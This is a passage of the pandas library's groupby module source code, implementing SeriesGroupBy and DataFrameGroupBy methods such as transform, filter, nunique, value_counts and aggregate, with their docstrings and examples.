values = next(iter(output.values()))
result = self.obj._constructor(values, index=index, name=name)
return self._reindex_output(result)
def _wrap_transformed_output(
self, output: Mapping[base.OutputKey, Series | ArrayLike]
) -> Series:
"""
Wraps the output of a SeriesGroupBy aggregation into the expected result.
Parameters
----------
output : dict[base.OutputKey, Union[Series, np.ndarray, ExtensionArray]]
Dict with a sole key of 0 and a value of the result values.
Returns
-------
Series
Notes
-----
output should always contain one element. It is specified as a dict
for consistency with DataFrame methods and _wrap_aggregated_output.
"""
assert len(output) == 1
name = self.obj.name
values = next(iter(output.values()))
result = self.obj._constructor(values, index=self.obj.index, name=name)
# No transformations increase the ndim of the result
assert isinstance(result, Series)
return result
def _wrap_applied_output(
self,
data: Series,
keys: Index,
values: list[Any] | None,
not_indexed_same: bool = False,
) -> FrameOrSeriesUnion:
"""
Wrap the output of SeriesGroupBy.apply into the expected result.
Parameters
----------
data : Series
Input data for groupby operation.
keys : Index
Keys of groups that Series was grouped by.
values : Optional[List[Any]]
Applied output for each group.
not_indexed_same : bool, default False
Whether the applied outputs are not indexed the same as the group axes.
Returns
-------
DataFrame or Series
"""
if len(keys) == 0:
# GH #6265
return self.obj._constructor(
[],
name=self.obj.name,
index=self.grouper.result_index,
dtype=data.dtype,
)
assert values is not None
def _get_index() -> Index:
if self.grouper.nkeys > 1:
index = MultiIndex.from_tuples(keys, names=self.grouper.names)
else:
index = Index(keys, name=self.grouper.names[0])
return index
if isinstance(values[0], dict):
# GH #823 #24880
index = _get_index()
res_df = self.obj._constructor_expanddim(values, index=index)
res_df = self._reindex_output(res_df)
# if self.observed is False,
# keep all-NaN rows created while re-indexing
res_ser = res_df.stack(dropna=self.observed)
res_ser.name = self.obj.name
return res_ser
elif isinstance(values[0], (Series, DataFrame)):
return self._concat_objects(keys, values, not_indexed_same=not_indexed_same)
else:
# GH #6265 #24880
result = self.obj._constructor(
data=values, index=_get_index(), name=self.obj.name
)
return self._reindex_output(result)
def _aggregate_named(self, func, *args, **kwargs):
# Note: this is very similar to _aggregate_series_pure_python,
# but that does not pin group.name
result = {}
initialized = False
for name, group in self:
# Each step of this loop corresponds to
# libreduction._BaseGrouper._apply_to_group
# NB: libreduction does not pin name
object.__setattr__(group, "name", name)
output = func(group, *args, **kwargs)
output = libreduction.extract_result(output)
if not initialized:
# We only do this validation on the first iteration
libreduction.check_result_array(output, group.dtype)
initialized = True
result[name] = output
return result
@Substitution(klass="Series")
@Appender(_transform_template)
def transform(self, func, *args, engine=None, engine_kwargs=None, **kwargs):
return self._transform(
func, *args, engine=engine, engine_kwargs=engine_kwargs, **kwargs
)
def _cython_transform(
self, how: str, numeric_only: bool = True, axis: int = 0, **kwargs
):
assert axis == 0 # handled by caller
obj = self._selected_obj
is_numeric = is_numeric_dtype(obj.dtype)
if numeric_only and not is_numeric:
raise DataError("No numeric types to aggregate")
try:
result = self.grouper._cython_operation(
"transform", obj._values, how, axis, **kwargs
)
except (NotImplementedError, TypeError):
raise DataError("No numeric types to aggregate")
return obj._constructor(result, index=self.obj.index, name=obj.name)
def _transform_general(self, func: Callable, *args, **kwargs) -> Series:
"""
        Transform with a callable ``func``.
"""
assert callable(func)
klass = type(self.obj)
results = []
for name, group in self:
# this setattr is needed for test_transform_lambda_with_datetimetz
object.__setattr__(group, "name", name)
res = func(group, *args, **kwargs)
results.append(klass(res, index=group.index))
# check for empty "results" to avoid concat ValueError
if results:
from pandas.core.reshape.concat import concat
concatenated = concat(results)
result = self._set_result_index_ordered(concatenated)
else:
result = self.obj._constructor(dtype=np.float64)
result.name = self.obj.name
# error: Incompatible return value type (got "Union[DataFrame, Series]",
# expected "Series")
return result # type: ignore[return-value]
def _can_use_transform_fast(self, result) -> bool:
return True
def _wrap_transform_fast_result(self, result: Series) -> Series:
"""
fast version of transform, only applicable to
builtin/cythonizable functions
"""
ids, _, _ = self.grouper.group_info
result = result.reindex(self.grouper.result_index, copy=False)
out = algorithms.take_nd(result._values, ids)
return self.obj._constructor(out, index=self.obj.index, name=self.obj.name)
def filter(self, func, dropna: bool = True, *args, **kwargs):
"""
Return a copy of a Series excluding elements from groups that
do not satisfy the boolean criterion specified by func.
Parameters
----------
func : function
To apply to each group. Should return True or False.
dropna : Drop groups that do not pass the filter. True by default;
if False, groups that evaluate False are filled with NaNs.
Notes
-----
Functions that mutate the passed object can produce unexpected
behavior or errors and are not supported. See :ref:`gotchas.udf-mutation`
for more details.
Examples
--------
>>> df = pd.DataFrame({'A' : ['foo', 'bar', 'foo', 'bar',
... 'foo', 'bar'],
... 'B' : [1, 2, 3, 4, 5, 6],
... 'C' : [2.0, 5., 8., 1., 2., 9.]})
>>> grouped = df.groupby('A')
>>> df.groupby('A').B.filter(lambda x: x.mean() > 3.)
1 2
3 4
5 6
Name: B, dtype: int64
Returns
-------
filtered : Series
"""
if isinstance(func, str):
wrapper = lambda x: getattr(x, func)(*args, **kwargs)
else:
wrapper = lambda x: func(x, *args, **kwargs)
# Interpret np.nan as False.
def true_and_notna(x) -> bool:
b = wrapper(x)
return b and notna(b)
try:
indices = [
self._get_index(name) for name, group in self if true_and_notna(group)
]
except (ValueError, TypeError) as err:
raise TypeError("the filter must return a boolean result") from err
filtered = self._apply_filter(indices, dropna)
return filtered
def nunique(self, dropna: bool = True) -> Series:
"""
Return number of unique elements in the group.
Returns
-------
Series
Number of unique values within each group.
"""
ids, _, _ = self.grouper.group_info
val = self.obj._values
codes, _ = algorithms.factorize(val, sort=False)
sorter = np.lexsort((codes, ids))
codes = codes[sorter]
ids = ids[sorter]
# group boundaries are where group ids change
# unique observations are where sorted values change
idx = np.r_[0, 1 + np.nonzero(ids[1:] != ids[:-1])[0]]
inc = np.r_[1, codes[1:] != codes[:-1]]
# 1st item of each group is a new unique observation
mask = codes == -1
if dropna:
inc[idx] = 1
inc[mask] = 0
else:
inc[mask & np.r_[False, mask[:-1]]] = 0
inc[idx] = 1
out = np.add.reduceat(inc, idx).astype("int64", copy=False)
if len(ids):
# NaN/NaT group exists if the head of ids is -1,
# so remove it from res and exclude its index from idx
if ids[0] == -1:
res = out[1:]
idx = idx[np.flatnonzero(idx)]
else:
res = out
else:
res = out[1:]
ri = self.grouper.result_index
# we might have duplications among the bins
if len(res) != len(ri):
res, out = np.zeros(len(ri), dtype=out.dtype), res
res[ids[idx]] = out
result = self.obj._constructor(res, index=ri, name=self.obj.name)
return self._reindex_output(result, fill_value=0)
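    # Illustrative example for nunique (not from the original docstring; standard
    # pandas semantics assumed):
    #
    #     >>> s = pd.Series([1, 1, 2, 3], index=["a", "a", "b", "b"])
    #     >>> s.groupby(level=0).nunique()
    #     a    1
    #     b    2
    #     dtype: int64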
@doc(Series.describe)
def describe(self, **kwargs):
result = self.apply(lambda x: x.describe(**kwargs))
if self.axis == 1:
return result.T
return result.unstack()
def value_counts(
self,
normalize: bool = False,
sort: bool = True,
ascending: bool = False,
bins=None,
dropna: bool = True,
):
from pandas.core.reshape.merge import get_join_indexers
from pandas.core.reshape.tile import cut
ids, _, _ = self.grouper.group_info
val = self.obj._values
def apply_series_value_counts():
return self.apply(
Series.value_counts,
normalize=normalize,
sort=sort,
ascending=ascending,
bins=bins,
)
if bins is not None:
if not np.iterable(bins):
# scalar bins cannot be done at top level
# in a backward compatible way
return apply_series_value_counts()
elif is_categorical_dtype(val.dtype):
# GH38672
return apply_series_value_counts()
# groupby removes null keys from groupings
mask = ids != -1
ids, val = ids[mask], val[mask]
if bins is None:
lab, lev = algorithms.factorize(val, sort=True)
llab = lambda lab, inc: lab[inc]
else:
# lab is a Categorical with categories an IntervalIndex
lab = cut(Series(val), bins, include_lowest=True)
# error: "ndarray" has no attribute "cat"
lev = lab.cat.categories # type: ignore[attr-defined]
# error: No overload variant of "take" of "_ArrayOrScalarCommon" matches
# argument types "Any", "bool", "Union[Any, float]"
lab = lev.take( # type: ignore[call-overload]
# error: "ndarray" has no attribute "cat"
lab.cat.codes, # type: ignore[attr-defined]
allow_fill=True,
# error: Item "ndarray" of "Union[ndarray, Index]" has no attribute
# "_na_value"
fill_value=lev._na_value, # type: ignore[union-attr]
)
llab = lambda lab, inc: lab[inc]._multiindex.codes[-1]
if is_interval_dtype(lab.dtype):
# TODO: should we do this inside II?
# error: "ndarray" has no attribute "left"
# error: "ndarray" has no attribute "right"
sorter = np.lexsort(
(lab.left, lab.right, ids) # type: ignore[attr-defined]
)
else:
sorter = np.lexsort((lab, ids))
ids, lab = ids[sorter], lab[sorter]
# group boundaries are where group ids change
idchanges = 1 + np.nonzero(ids[1:] != ids[:-1])[0]
idx = np.r_[0, idchanges]
if not len(ids):
idx = idchanges
# new values are where sorted labels change
lchanges = llab(lab, slice(1, None)) != llab(lab, slice(None, -1))
inc = np.r_[True, lchanges]
if not len(lchanges):
inc = lchanges
inc[idx] = True # group boundaries are also new values
out = np.diff(np.nonzero(np.r_[inc, True])[0]) # value counts
# num. of times each group should be repeated
rep = partial(np.repeat, repeats=np.add.reduceat(inc, idx))
# multi-index components
codes = self.grouper.reconstructed_codes
codes = [rep(level_codes) for level_codes in codes] + [llab(lab, inc)]
levels = [ping.group_index for ping in self.grouper.groupings] + [lev]
names = self.grouper.names + [self.obj.name]
if dropna:
mask = codes[-1] != -1
if mask.all():
dropna = False
else:
out, codes = out[mask], [level_codes[mask] for level_codes in codes]
if normalize:
out = out.astype("float")
d = np.diff(np.r_[idx, len(ids)])
if dropna:
m = ids[lab == -1]
np.add.at(d, m, -1)
acc = rep(d)[mask]
else:
acc = rep(d)
out /= acc
if sort and bins is None:
cat = ids[inc][mask] if dropna else ids[inc]
sorter = np.lexsort((out if ascending else -out, cat))
out, codes[-1] = out[sorter], codes[-1][sorter]
if bins is not None:
# for compat. with libgroupby.value_counts need to ensure every
# bin is present at every index level, null filled with zeros
diff = np.zeros(len(out), dtype="bool")
for level_codes in codes[:-1]:
diff |= np.r_[True, level_codes[1:] != level_codes[:-1]]
ncat, nbin = diff.sum(), len(levels[-1])
left = [np.repeat(np.arange(ncat), nbin), np.tile(np.arange(nbin), ncat)]
right = [diff.cumsum() - 1, codes[-1]]
_, idx = get_join_indexers(left, right, sort=False, how="left")
out = np.where(idx != -1, out[idx], 0)
if sort:
sorter = np.lexsort((out if ascending else -out, left[0]))
out, left[-1] = out[sorter], left[-1][sorter]
# build the multi-index w/ full levels
def build_codes(lev_codes: np.ndarray) -> np.ndarray:
return np.repeat(lev_codes[diff], nbin)
codes = [build_codes(lev_codes) for lev_codes in codes[:-1]]
codes.append(left[-1])
mi = MultiIndex(levels=levels, codes=codes, names=names, verify_integrity=False)
if is_integer_dtype(out.dtype):
out = ensure_int64(out)
return self.obj._constructor(out, index=mi, name=self.obj.name)
def count(self) -> Series:
"""
Compute count of group, excluding missing values.
Returns
-------
Series
Count of values within each group.
"""
ids, _, ngroups = self.grouper.group_info
val = self.obj._values
mask = (ids != -1) & ~isna(val)
minlength = ngroups or 0
out = np.bincount(ids[mask], minlength=minlength)
result = self.obj._constructor(
out,
index=self.grouper.result_index,
name=self.obj.name,
dtype="int64",
)
return self._reindex_output(result, fill_value=0)
def pct_change(self, periods=1, fill_method="pad", limit=None, freq=None):
"""Calculate pct_change of each value to previous entry in group"""
# TODO: Remove this conditional when #23918 is fixed
if freq:
return self.apply(
lambda x: x.pct_change(
periods=periods, fill_method=fill_method, limit=limit, freq=freq
)
)
if fill_method is None: # GH30463
fill_method = "pad"
limit = 0
filled = getattr(self, fill_method)(limit=limit)
fill_grp = filled.groupby(self.grouper.codes)
shifted = fill_grp.shift(periods=periods, freq=freq)
return (filled / shifted) - 1
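# Illustrative example for SeriesGroupBy.pct_change (not from the original docstrings;
# standard pandas semantics assumed):
#
#     >>> s = pd.Series([1, 2, 4, 7])
#     >>> s.groupby([1, 1, 2, 2]).pct_change()
#     0     NaN
#     1    1.00
#     2     NaN
#     3    0.75
#     dtype: float64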
@pin_allowlisted_properties(DataFrame, base.dataframe_apply_allowlist)
class DataFrameGroupBy(GroupBy[DataFrame]):
_apply_allowlist = base.dataframe_apply_allowlist
_agg_examples_doc = dedent(
"""
Examples
--------
>>> df = pd.DataFrame(
... {
... "A": [1, 1, 2, 2],
... "B": [1, 2, 3, 4],
... "C": [0.362838, 0.227877, 1.267767, -0.562860],
... }
... )
>>> df
A B C
0 1 1 0.362838
1 1 2 0.227877
2 2 3 1.267767
3 2 4 -0.562860
The aggregation is for each column.
>>> df.groupby('A').agg('min')
B C
A
1 1 0.227877
2 3 -0.562860
Multiple aggregations
>>> df.groupby('A').agg(['min', 'max'])
B C
min max min max
A
1 1 2 0.227877 0.362838
2 3 4 -0.562860 1.267767
Select a column for aggregation
>>> df.groupby('A').B.agg(['min', 'max'])
min max
A
1 1 2
2 3 4
Different aggregations per column
>>> df.groupby('A').agg({'B': ['min', 'max'], 'C': 'sum'})
B C
min max sum
A
1 1 2 0.590715
2 3 4 0.704907
To control the output names with different aggregations per column,
pandas supports "named aggregation"
>>> df.groupby("A").agg(
... b_min=pd.NamedAgg(column="B", aggfunc="min"),
... c_sum=pd.NamedAgg(column="C", aggfunc="sum"))
b_min c_sum
A
1 1 0.590715
2 3 0.704907
- The keywords are the *output* column names
- The values are tuples whose first element is the column to select
and the second element is the aggregation to apply to that column.
Pandas provides the ``pandas.NamedAgg`` namedtuple with the fields
``['column', 'aggfunc']`` to make it clearer what the arguments are.
As usual, the aggregation can be a callable or a string alias.
See :ref:`groupby.aggregate.named` for more.
.. versionchanged:: 1.3.0
The resulting dtype will reflect the return value of the aggregating function.
>>> df.groupby("A")[["B"]].agg(lambda x: x.astype(float).min())
B
A
1 1.0
2 3.0"""
)
@doc(_agg_template, examples=_agg_examples_doc, klass="DataFrame")
def aggregate(self, func=None, *args, engine=None, engine_kwargs=None, **kwargs):
if maybe_use_numba(engine):
with group_selection_context(self):
data = self._selected_obj
result, index = self._aggregate_with_numba(
data, func, *args, engine_kwargs=engine_kwargs, **kwargs
)
return self.obj._constructor(result, index=index, columns=data.columns)
relabeling, func, columns, order = reconstruct_func(func, **kwargs)
func = maybe_mangle_lambdas(func)
op = GroupByApply(self, func, args, kwargs)
result = op.agg()
if not is_dict_like(func) and result is not None:
return result
elif relabeling and result is not None:
# this should be the only (non-raising) case with relabeling
# used reordered index of columns
result = result.iloc[:, order]
result.columns = columns
if result is None:
# grouper specific aggregations
if self.grouper.nkeys > 1:
# test_groupby_as_index_series_scalar gets here with 'not self.as_index'
return self._python_agg_general(func, *args, **kwargs)
elif args or kwargs:
# test_pass_args_kwargs gets here (with and without as_index)
# can't return early
result = self._aggregate_frame(func, *args, **kwargs)
elif self.axis == 1:
# _aggregate_multiple_funcs does not allow self.axis == 1
# Note: axis == 1 precludes 'not self.as_index', see __init__
result = self._aggregate_frame(func)
return result
else:
# try to treat as if we are passing a list
gba = GroupByApply(self, [func], args=(), kwargs={})
try:
result = gba.agg()
except ValueError as err:
if "no results" not in str(err):
# raised directly by _aggregate_multiple_funcs
raise
result = self._aggregate_frame(func)
else:
sobj = self._selected_obj
if isinstance(sobj, Series):
# GH#35246 test_groupby_as_index_select_column_sum_empty_df
result.columns = [sobj.name]
else:
# select everything except for the last level, which is the one
# containing the name of the function(s), see GH#32040
result.columns = result.columns.rename(
[sobj.columns.name] * result.columns.nlevels
).droplevel(-1)
if not self.as_index:
self._insert_inaxis_grouper_inplace(result)
result.index = Index(range(len(result)))
return result._convert(datetime=True)
agg = aggregate
def _iterate_slices(self) -> Iterable[Series]:
obj = self._selected_obj
if self.axis == 1:
obj = obj.T
if isinstance(obj, Series) and obj.name not in self.exclusions:
# Occurs when doing DataFrameGroupBy(...)["X"]
yield obj
else:
for label, values in obj.items():
if label in self.exclusions:
continue
yield values
def _cython_agg_general(
self, how: str, alt: Callable, numeric_only: bool, min_count: int = -1
) -> DataFrame:
# Note: we never get here with how="ohlc"; that goes through SeriesGroupBy
data: Manager2D = self._get_data_to_aggregate()
orig = data
if numeric_only:
data = data.get_numeric_data(copy=False)
def array_func(values: ArrayLike) -> ArrayLike:
try:
result = self.grouper._cython_operation(
"aggregate", values, how, axis=data.ndim - 1, min_count=min_count
)
except NotImplementedError:
# generally if we have numeric_only=False
# and non-applicable functions
# try to python agg
# TODO: shouldn't min_count matter?
result = self._agg_py_fallback(values, ndim=data.ndim, alt=alt)
return result
# TypeError -> we may have an exception in trying to aggregate
# continue and exclude the block
new_mgr = data.grouped_reduce(array_func, ignore_failures=True)
if not len(new_mgr) and len(orig):
# If the original Manager was already empty, no need to raise
raise DataError("No numeric types to aggregate")
if len(new_mgr) < len(data):
warnings.warn(
f"Dropping invalid columns in {type(self).__name__}.{how} "
"is deprecated. In a future version, a TypeError will be raised. "
f"Before calling .{how}, select only columns which should be "
"valid for the function.",
FutureWarning,
stacklevel=4,
)
return self._wrap_agged_manager(new_mgr)
def _aggregate_frame(self, func, *args, **kwargs) -> DataFrame:
if self.grouper.nkeys != 1:
raise AssertionError("Number of keys must be 1")
obj = self._obj_with_exclusions
result: dict[Hashable, NDFrame | np.ndarray] = {}
if self.axis == 0:
# test_pass_args_kwargs_duplicate_columns gets here with non-unique columns
for name, data in self:
fres = func(data, *args, **kwargs)
result[name] = fres
else:
# we get here in a number of test_multilevel tests
for name in self.indices:
grp_df = self.get_group(name, obj=obj)
fres = func(grp_df, *args, **kwargs)
result[name] = fres
result_index = self.grouper.result_index
other_ax = obj.axes[1 - self.axis]
out = self.obj._constructor(result, index=other_ax, columns=result_index)
if self.axis == 0:
out = out.T
return out
def _aggregate_item_by_item(self, func, *args, **kwargs) -> DataFrame:
# only for axis==0
# tests that get here with non-unique cols:
# test_resample_with_timedelta_yields_no_empty_groups,
# test_resample_apply_product
obj = self._obj_with_exclusions
result: dict[int | str, NDFrame] = {}
for i, item in enumerate(obj):
ser = obj.iloc[:, i]
colg = SeriesGroupBy(
ser, selection=item, grouper=self.grouper, exclusions=self.exclusions
)
result[i] = colg.aggregate(func, *args, **kwargs)
res_df = self.obj._constructor(result)
res_df.columns = obj.columns
return res_df
def _wrap_applied_output(self, data, keys, values, not_indexed_same=False):
if len(keys) == 0:
result = self.obj._constructor(
index=self.grouper.result_index, columns=data.columns
)
result = result.astype(data.dtypes.to_dict(), copy=False)
return result
# GH12824
first_not_none = next(com.not_none(*values), None)
if first_not_none is None:
# GH9684 - All values are None, return an empty frame.
return self.obj._constructor()
elif isinstance(first_not_none, DataFrame):
return self._concat_objects(keys, values, not_indexed_same=not_indexed_same)
key_index = self.grouper.result_index if self.as_index else None
if isinstance(first_not_none, (np.ndarray, Index)):
# GH#1738: values is list of arrays of unequal lengths
# fall through to the outer else clause
# TODO: sure this is right? we used to do this
# after raising AttributeError above
return self.obj._constructor_sliced(
values, index=key_index, name=self._selection
)
elif not isinstance(first_not_none, Series):
# values are not series or array-like but scalars
# self._selection not passed through to Series as the
# result should not take the name of original selection
# of columns
if self.as_index:
return self.obj._constructor_sliced(values, index=key_index)
else:
result = self.obj._constructor(
values, index=key_index, columns=[self._selection]
)
self._insert_inaxis_grouper_inplace(result)
return result
else:
# values are Series
return self._wrap_applied_output_series(
keys, values, not_indexed_same, first_not_none, key_index
)
def _wrap_applied_output_series(
self,
keys,
values: list[Series],
not_indexed_same: bool,
first_not_none,
key_index,
) -> FrameOrSeriesUnion:
# this is to silence a DeprecationWarning
# TODO: Remove when default dtype of empty Series is object
kwargs = first_not_none._construct_axes_dict()
backup = create_series_with_explicit_dtype(dtype_if_empty=object, **kwargs)
values = [x if (x is not None) else backup for x in values]
all_indexed_same = all_indexes_same(x.index for x in values)
# GH3596
# provide a reduction (Frame -> Series) if groups are
# unique
if self.squeeze:
applied_index = self._selected_obj._get_axis(self.axis)
singular_series = len(values) == 1 and applied_index.nlevels == 1
# assign the name to this series
if singular_series:
values[0].name = keys[0]
# GH2893
# we have series in the values array, we want to
# produce a series:
# if any of the sub-series are not indexed the same
# OR we don't have a multi-index and we have only a
# single values
return self._concat_objects(
keys, values, not_indexed_same=not_indexed_same
)
# still a series
# path added as of GH 5545
elif all_indexed_same:
from pandas.core.reshape.concat import concat
return concat(values)
if not all_indexed_same:
# GH 8467
return self._concat_objects(keys, values, not_indexed_same=True)
# Combine values
# vstack+constructor is faster than concat and handles MI-columns
stacked_values = np.vstack([np.asarray(v) for v in values])
if self.axis == 0:
index = key_index
columns = first_not_none.index.copy()
if columns.name is None:
# GH6124 - propagate name of Series when it's consistent
names = {v.name for v in values}
if len(names) == 1:
columns.name = list(names)[0]
else:
index = first_not_none.index
columns = key_index
stacked_values = stacked_values.T
if stacked_values.dtype == object:
# We'll have the DataFrame constructor do inference
stacked_values = stacked_values.tolist()
result = self.obj._constructor(stacked_values, index=index, columns=columns)
if not self.as_index:
self._insert_inaxis_grouper_inplace(result)
return self._reindex_output(result)
def _cython_transform(
self, how: str, numeric_only: bool = True, axis: int = 0, **kwargs
) -> DataFrame:
assert axis == 0 # handled by caller
# TODO: no tests with self.ndim == 1 for DataFrameGroupBy
# With self.axis == 0, we have multi-block tests
# e.g. test_rank_min_int, test_cython_transform_frame
# test_transform_numeric_ret
# With self.axis == 1, _get_data_to_aggregate does a transpose
# so we always have a single block.
mgr: Manager2D = self._get_data_to_aggregate()
if numeric_only:
mgr = mgr.get_numeric_data(copy=False)
def arr_func(bvalues: ArrayLike) -> ArrayLike:
return self.grouper._cython_operation(
"transform", bvalues, how, 1, **kwargs
)
# We could use `mgr.apply` here and not have to set_axis, but
# we would have to do shape gymnastics for ArrayManager compat
res_mgr = mgr.grouped_reduce(arr_func, ignore_failures=True)
res_mgr.set_axis(1, mgr.axes[1])
if len(res_mgr) < len(mgr):
warnings.warn(
f"Dropping invalid columns in {type(self).__name__}.{how} "
"is deprecated. In a future version, a TypeError will be raised. "
f"Before calling .{how}, select only columns which should be "
"valid for the transforming function.",
FutureWarning,
stacklevel=4,
)
res_df = self.obj._constructor(res_mgr)
if self.axis == 1:
res_df = res_df.T
return res_df
def _transform_general(self, func, *args, **kwargs):
from pandas.core.reshape.concat import concat
applied = []
obj = self._obj_with_exclusions
gen = self.grouper.get_iterator(obj, axis=self.axis)
fast_path, slow_path = self._define_paths(func, *args, **kwargs)
for name, group in gen:
object.__setattr__(group, "name", name)
# Try slow path and fast path.
try:
path, res = self._choose_path(fast_path, slow_path, group)
except TypeError:
return self._transform_item_by_item(obj, fast_path)
except ValueError as err:
msg = "transform must return a scalar value for each group"
raise ValueError(msg) from err
if isinstance(res, Series):
# we need to broadcast across the
# other dimension; this will preserve dtypes
# GH14457
if not np.prod(group.shape):
continue
elif res.index.is_(obj.index):
r = concat([res] * len(group.columns), axis=1)
r.columns = group.columns
r.index = group.index
else:
r = self.obj._constructor(
np.concatenate([res.values] * len(group.index)).reshape(
group.shape
),
columns=group.columns,
index=group.index,
)
applied.append(r)
else:
applied.append(res)
concat_index = obj.columns if self.axis == 0 else obj.index
other_axis = 1 if self.axis == 0 else 0 # switches between 0 & 1
concatenated = concat(applied, axis=self.axis, verify_integrity=False)
concatenated = concatenated.reindex(concat_index, axis=other_axis, copy=False)
return self._set_result_index_ordered(concatenated)
@Substitution(klass="DataFrame")
@Appender(_transform_template)
def transform(self, func, *args, engine=None, engine_kwargs=None, **kwargs):
return self._transform(
func, *args, engine=engine, engine_kwargs=engine_kwargs, **kwargs
)
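    # Editor's example (not part of the original pandas source; data is
    # illustrative): transform returns an object aligned with the caller's
    # index, broadcasting each group's result back onto the original rows.
    #
    #   >>> df = pd.DataFrame({"key": ["a", "a", "b"], "val": [1, 3, 5]})
    #   >>> df.groupby("key").transform("mean")
    #      val
    #   0  2.0
    #   1  2.0
    #   2  5.0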
def _can_use_transform_fast(self, result) -> bool:
return isinstance(result, DataFrame) and result.columns.equals(
self._obj_with_exclusions.columns
)
def _wrap_transform_fast_result(self, result: DataFrame) -> DataFrame:
"""
Fast transform path for aggregations
"""
obj = self._obj_with_exclusions
# for each col, reshape to size of original frame by take operation
ids, _, _ = self.grouper.group_info
result = result.reindex(self.grouper.result_index, copy=False)
output = result.take(ids, axis=0)
output.index = obj.index
return output
def _define_paths(self, func, *args, **kwargs):
if isinstance(func, str):
fast_path = lambda group: getattr(group, func)(*args, **kwargs)
slow_path = lambda group: group.apply(
lambda x: getattr(x, func)(*args, **kwargs), axis=self.axis
)
else:
fast_path = lambda group: func(group, *args, **kwargs)
slow_path = lambda group: group.apply(
lambda x: func(x, *args, **kwargs), axis=self.axis
)
return fast_path, slow_path
def _choose_path(self, fast_path: Callable, slow_path: Callable, group: DataFrame):
path = slow_path
res = slow_path(group)
# if we make it here, test if we can use the fast path
try:
res_fast = fast_path(group)
except AssertionError:
raise # pragma: no cover
except Exception:
# GH#29631 For user-defined function, we can't predict what may be
# raised; see test_transform.test_transform_fastpath_raises
return path, res
# verify fast path does not change columns (and names), otherwise
# its results cannot be joined with those of the slow path
if not isinstance(res_fast, DataFrame):
return path, res
if not res_fast.columns.equals(group.columns):
return path, res
if res_fast.equals(res):
path = fast_path
return path, res
def _transform_item_by_item(self, obj: DataFrame, wrapper) -> DataFrame:
# iterate through columns, see test_transform_exclude_nuisance
# gets here with non-unique columns
output = {}
inds = []
for i, col in enumerate(obj):
subset = obj.iloc[:, i]
sgb = SeriesGroupBy(
subset,
selection=col,
grouper=self.grouper,
exclusions=self.exclusions,
)
try:
output[i] = sgb.transform(wrapper)
except TypeError:
# e.g. trying to call nanmean with string values
warnings.warn(
f"Dropping invalid columns in {type(self).__name__}.transform "
"is deprecated. In a future version, a TypeError will be raised. "
"Before calling .transform, select only columns which should be "
"valid for the transforming function.",
FutureWarning,
stacklevel=5,
)
else:
inds.append(i)
if not output:
raise TypeError("Transform function invalid for data types")
columns = obj.columns.take(inds)
result = self.obj._constructor(output, index=obj.index)
result.columns = columns
return result
def filter(self, func, dropna=True, *args, **kwargs):
"""
Return a copy of a DataFrame excluding filtered elements.
Elements from groups are filtered if they do not satisfy the
boolean criterion specified by func.
Parameters
----------
func : function
Function to apply to each subframe. Should return True or False.
dropna : Drop groups that do not pass the filter. True by default;
If False, groups that evaluate False are filled with NaNs.
Returns
-------
filtered : DataFrame
Notes
-----
Each subframe is endowed the attribute 'name' in case you need to know
which group you are working on.
Functions that mutate the passed object can produce unexpected
behavior or errors and are not supported. See :ref:`gotchas.udf-mutation`
for more details.
Examples
--------
>>> df = pd.DataFrame({'A' : ['foo', 'bar', 'foo', 'bar',
... 'foo', 'bar'],
... 'B' : [1, 2, 3, 4, 5, 6],
... 'C' : [2.0, 5., 8., 1., 2., 9.]})
>>> grouped = df.groupby('A')
>>> grouped.filter(lambda x: x['B'].mean() > 3.)
A B C
1 bar 2 5.0
3 bar 4 1.0
5 bar 6 9.0
"""
indices = []
obj = self._selected_obj
gen = self.grouper.get_iterator(obj, axis=self.axis)
for name, group in gen:
object.__setattr__(group, "name", name)
res = func(group, *args, **kwargs)
try:
res = res.squeeze()
except AttributeError: # allow e.g., scalars and frames to pass
pass
# interpret the result of the filter
if is_bool(res) or (is_scalar(res) and isna(res)):
if res and notna(res):
indices.append(self._get_index(name))
else:
# non scalars aren't allowed
raise TypeError(
f"filter function returned a {type(res).__name__}, "
"but expected a scalar bool"
)
return self._apply_filter(indices, dropna)
def __getitem__(self, key) -> DataFrameGroupBy | SeriesGroupBy:
if self.axis == 1:
# GH 37725
raise ValueError("Cannot subset columns when using axis=1")
# per GH 23566
if isinstance(key, tuple) and len(key) > 1:
# if len == 1, then it becomes a SeriesGroupBy and this is actually
# valid syntax, so don't raise warning
warnings.warn(
"Indexing with multiple keys (implicitly converted to a tuple "
"of keys) will be deprecated, use a list instead.",
FutureWarning,
stacklevel=2,
)
return super().__getitem__(key)
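    # Editor's example (not part of the original pandas source): a single key
    # returns a SeriesGroupBy, a list of keys returns a DataFrameGroupBy, and
    # tuple keys (grouped["A", "B"]) are deprecated above in favour of a list.
    #
    #   >>> gb = df.groupby("key")
    #   >>> gb["val"]            # SeriesGroupBy
    #   >>> gb[["val"]]          # DataFrameGroupBy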
def _gotitem(self, key, ndim: int, subset=None):
"""
sub-classes to define
return a sliced object
Parameters
----------
key : string / list of selections
ndim : {1, 2}
requested ndim of result
subset : object, default None
subset to act on
"""
if ndim == 2:
if subset is None:
subset = self.obj
return DataFrameGroupBy(
subset,
self.grouper,
axis=self.axis,
level=self.level,
grouper=self.grouper,
exclusions=self.exclusions,
selection=key,
as_index=self.as_index,
sort=self.sort,
group_keys=self.group_keys,
squeeze=self.squeeze,
observed=self.observed,
mutated=self.mutated,
dropna=self.dropna,
)
elif ndim == 1:
if subset is None:
subset = self.obj[key]
return SeriesGroupBy(
subset,
level=self.level,
grouper=self.grouper,
selection=key,
sort=self.sort,
group_keys=self.group_keys,
squeeze=self.squeeze,
observed=self.observed,
dropna=self.dropna,
)
raise AssertionError("invalid ndim for _gotitem")
def _get_data_to_aggregate(self) -> Manager2D:
obj = self._obj_with_exclusions
if self.axis == 1:
return obj.T._mgr
else:
return obj._mgr
def _insert_inaxis_grouper_inplace(self, result: DataFrame) -> None:
# zip in reverse so we can always insert at loc 0
columns = result.columns
for name, lev, in_axis in zip(
reversed(self.grouper.names),
reversed(self.grouper.get_group_levels()),
reversed([grp.in_axis for grp in self.grouper.groupings]),
):
# GH #28549
# When using .apply(-), name will be in columns already
if in_axis and name not in columns:
result.insert(0, name, lev)
def _wrap_aggregated_output(
self,
output: Mapping[base.OutputKey, Series | ArrayLike],
) -> DataFrame:
"""
Wraps the output of DataFrameGroupBy aggregations into the expected result.
Parameters
----------
output : Mapping[base.OutputKey, Union[Series, np.ndarray]]
Data to wrap.
Returns
-------
DataFrame
"""
indexed_output = {key.position: val for key, val in output.items()}
columns = Index([key.label for key in output])
columns._set_names(self._obj_with_exclusions._get_axis(1 - self.axis).names)
result = self.obj._constructor(indexed_output)
result.columns = columns
